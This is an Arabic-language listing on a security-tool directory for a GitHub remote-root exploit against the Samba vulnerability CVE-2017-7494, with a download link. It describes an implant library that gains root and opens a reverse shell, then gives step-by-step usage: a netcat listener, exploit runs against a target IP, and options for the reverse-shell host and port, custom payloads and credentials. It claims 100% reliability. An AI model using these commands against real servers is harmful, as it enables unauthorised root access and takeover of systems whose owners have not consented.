Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-7494 — استغلال عن بُعد بصلاحيات الجذر لثغرة SAMBA CVE-2017-7494 | Kitploit
أدوات/GitHubGitHub/joxeankoret/cve-2017-7494
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقأداة الوصول عن بعدArchived
GitHubjoxeankoret/cve-2017-7494

CVE-2017-7494

استغلال عن بُعد بصلاحيات الجذر لثغرة SAMBA CVE-2017-7494

عرض المستودع
25974منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-7494

استغلال يمنح صلاحيات الجذر عن بُعد لثغرة SAMBA CVE-2017-7494.

التفاصيل

ينقسم هذا الاستغلال إلى جزأين:

  • أولاً، يقوم بتجميع حمولة تُسمى "implant.c" وينشئ مكتبة (libimplantx32.so أو libimplantx64.so) تقوم بالتبديل إلى مستخدم الجذر، والانفصال عن العملية الأم، وتشغيل شل عكسي.
  • ثانياً، يبحث عن مشاركة قابلة للكتابة في المضيف الهدف المحدد، ويرفع المكتبة باسم عشوائي ويحاول تحميلها.

طالما أن الهدف معرّض للثغرة والحمولة مناسبة لنظام التشغيل والمعمارية للهدف، فإن الاستغلال موثوق بنسبة 100%.

طريقة الاستخدام

على جهازك، شغّل الأمر التالي:

root@kitploit:~
$ nc -p 31337 -l

ثم شغّل الاستغلال ضد هدفك وانتظر حتى يتصل مرة أخرى بـ Netcat الخاص بك:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

إذا أغلقت الشل العكسي بسرعة كبيرة، فبدلاً من إعادة تشغيل الاستغلال لرفع الوحدة، إلخ... يمكنك ببساطة تمرير مسار الوحدة التي تم رفعها مسبقًا. بافتراض أنه تم رفعها إلى /shared/directory/ باسم "module.so"، يمكنك تشغيل أمر مثل الأمر التالي:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

تحديث 11/25/2017 - Archivaldo

يمكنك الآن تشغيل الاستغلال ضد samba 3.5.0 و3.6.0، فقط تحتاج إلى إضافة الوسيط -o 1

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

يمكنك الآن استخدام ملف .so المخصص الخاص بك:

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

إذا احتجت إلى تشغيل هذا السكربت من جهاز x86، فإن تجميع ملفات implant الثنائية سينشئ ملفين x86. باستخدام الخيار -n 1 يمكنك تعطيل التجميع ونسخ libimplantx64.so من جهاز آخر.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

إذا كان samba يعمل فقط على المنفذ 139. يمكنك ضبط منفذ الخادم البعيد باستخدام الوسيط -p

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

ملاحظات

لم أعد أدعمه بعد الآن.

-- Joxean Koret

تنزيل الأداة